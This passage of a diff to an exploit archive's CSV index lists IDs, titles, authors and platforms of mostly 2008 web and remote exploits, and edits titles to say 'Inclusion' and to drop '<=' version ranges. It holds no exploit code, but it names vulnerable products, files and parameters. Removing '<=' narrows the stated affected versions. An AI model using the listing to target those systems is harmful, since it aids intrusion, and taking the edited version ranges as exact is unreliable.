Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 @@ -27952,14 +27952,14 @@ id,file,description,date,author,platform,type,port 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0 31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0 -31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Include",2008-01-28,p4imi0,php,webapps,0 +31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0 31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0 -31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0 +31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0 31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 - 'add1' Parameter Cross-Site Scripting",2008-01-29,"Brendan M. Hickey",java,webapps,0 -31074,platforms/php/webapps/31074.txt,"Nucleus CMS <= 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps,0 +31074,platforms/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps,0 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,php,webapps,0 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote,0 31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0 @@ -27993,10 +27993,10 @@ id,file,description,date,author,platform,type,port 31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31110,platforms/php/webapps/31110.txt,"Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 -31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion Multiple Local File Include Vulnerabilities",2008-02-05,Psiczn,php,webapps,0 +31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion Multiple Local File Inclusion Vulnerabilities",2008-02-05,Psiczn,php,webapps,0 31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0 -31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 +31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0 31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Parameter Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps,0 31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 @@ -28005,14 +28005,14 @@ id,file,description,date,author,platform,type,port 31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0 31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 -31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0 +31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 -31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Include",2008-02-08,Cr@zy_King,php,webapps,0 +31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 -31127,platforms/linux/remote/31127.txt,"Mozilla Firefox <= 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 +31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 -31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 +31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0 31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 @@ -28038,12 +28038,12 @@ id,file,description,date,author,platform,type,port 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0 31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 -31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 -31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0 -31158,platforms/php/webapps/31158.txt,"Cacti <= 0.8.7 graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0 -31159,platforms/php/webapps/31159.txt,"Cacti <= 0.8.7 tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 -31160,platforms/php/webapps/31160.txt,"Cacti <= 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 -31161,platforms/php/webapps/31161.txt,"Cacti <= 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0 +31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0 +31159,platforms/php/webapps/31159.txt,"Cacti 0.8.7 tree.php Multiple Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31160,platforms/php/webapps/31160.txt,"Cacti 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 +31161,platforms/php/webapps/31161.txt,"Cacti 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection",2008-02-12,S@BUN,php,webapps,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0 31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 @@ -28079,19 +28079,19 @@ id,file,description,date,author,platform,type,port 31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 +31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities",2008-02-13,S@BUN,asp,webapps,0 31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 31193,platforms/php/webapps/31193.txt,"Joomla! and Mambo 'com_omnirealestate' Component - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 -31194,platforms/php/webapps/31194.txt,"Dokeos <= 1.8.4 whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31195,platforms/php/webapps/31195.txt,"Dokeos <= 1.8.4 main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31196,platforms/php/webapps/31196.txt,"Dokeos <= 1.8.4 main/calendar/myagenda.php courseCode Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31197,platforms/php/webapps/31197.txt,"Dokeos <= 1.8.4 main/admin/course_category.php category Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31198,platforms/php/webapps/31198.txt,"Dokeos <= 1.8.4 main/admin/session_list.php cmessage Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31199,platforms/php/webapps/31199.txt,"Dokeos <= 1.8.4 main/mySpace/index.php tracking_list_coaches_column Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31200,platforms/php/webapps/31200.txt,"Dokeos <= 1.8.4 main/create_course/add_course.php tutor_name Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Include Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 -31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include",2008-02-14,muuratsalo,php,webapps,0 +31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 main/calendar/myagenda.php courseCode Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 main/admin/course_category.php category Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 main/admin/session_list.php cmessage Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31199,platforms/php/webapps/31199.txt,"Dokeos 1.8.4 main/mySpace/index.php tracking_list_coaches_column Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31200,platforms/php/webapps/31200.txt,"Dokeos 1.8.4 main/create_course/add_course.php tutor_name Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Inclusion Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 +31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0 31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 @@ -28106,12 +28106,12 @@ id,file,description,date,author,platform,type,port 31214,platforms/php/webapps/31214.txt,"Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Include",2008-02-16,muuratsalo,php,webapps,0 +31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0 32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0 32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 - 'admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,php,webapps,0 -32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Include",2008-08-13,CraCkEr,php,webapps,0 +32244,platforms/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - modules.php module Parameter XSS",2008-08-13,CraCkEr,php,webapps,0 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 @@ -28153,9 +28153,9 @@ id,file,description,date,author,platform,type,port 31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 - CWD Command Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 -31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Include",2008-03-04,The-0utl4w,php,webapps,0 +31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'fileName' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos,0 -31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Include",2008-03-24,ZoRLu,php,webapps,0 +31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 @@ -28188,7 +28188,7 @@ id,file,description,date,author,platform,type,port 31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module - 'cid' Parameter SQL Injection",2008-02-25,"Aria-Security Team",php,webapps,0 31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Parameter Cross-Site Scripting",2008-02-25,nnposter,hardware,remote,0 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0 -31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail <= 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 +31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"SurgeMail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter NULL Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 @@ -28197,15 +28197,15 @@ id,file,description,date,author,platform,type,port 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow",2008-02-27,"Will Drewry",linux,remote,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow and Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos,0 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",hardware,remote,0 -31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Include",2008-02-28,MhZ91,php,webapps,0 +31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps,0 31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 - Authentication Bypass and Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 -31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - index.php Local File Include",2008-02-29,JosS,php,webapps,0 +31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - index.php Local File Inclusion",2008-02-29,JosS,php,webapps,0 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x - index.php Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0 -31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 - tourney/index.php Remote File Include",2008-02-29,"HACKERS PAL",php,webapps,0 +31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 - tourney/index.php Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0 31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0 @@ -28219,7 +28219,7 @@ id,file,description,date,author,platform,type,port 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection",2008-03-05,ZoRLu,php,webapps,0 31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",hardware,remote,0 -31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Include",2008-03-06,THE_MILLER,php,webapps,0 +31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,php,webapps,0 31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow",2008-03-06,"Chris Evans",multiple,dos,0 31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection",2008-03-06,r080cy90r,php,webapps,0 @@ -28237,7 +28237,7 @@ id,file,description,date,author,platform,type,port 31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 -31360,platforms/windows/dos/31360.txt,"MailEnable <= 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 +31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos,0 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,multiple,remote,0 31363,platforms/windows/dos/31363.txt,"Panda Internet Security/Antivirus+Firewall 2008 - CPoint.sys Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 @@ -28252,7 +28252,7 @@ id,file,description,date,author,platform,type,port 31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 - thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 - describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 -31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Include",2008-03-10,THE_MILLER,php,webapps,0 +31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Inclusion",2008-03-10,THE_MILLER,php,webapps,0 31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' Parameter SQL Injection",2008-03-10,Lovebug,php,webapps,0 31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter NULL Pointer Denial Of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 @@ -28263,8 +28263,8 @@ id,file,description,date,author,platform,type,port 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' Parameter SQL Injection",2008-03-11,Houssamix,php,webapps,0 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' Parameter SQL Injection",2008-03-11,Lovebug,php,webapps,0 31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - (.m3u) SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 -31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 -31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusion Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusion Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 @@ -28280,7 +28280,7 @@ id,file,description,date,author,platform,type,port 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0 31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 -31401,platforms/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Include",2008-03-12,U238,php,webapps,0 +31401,platforms/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File 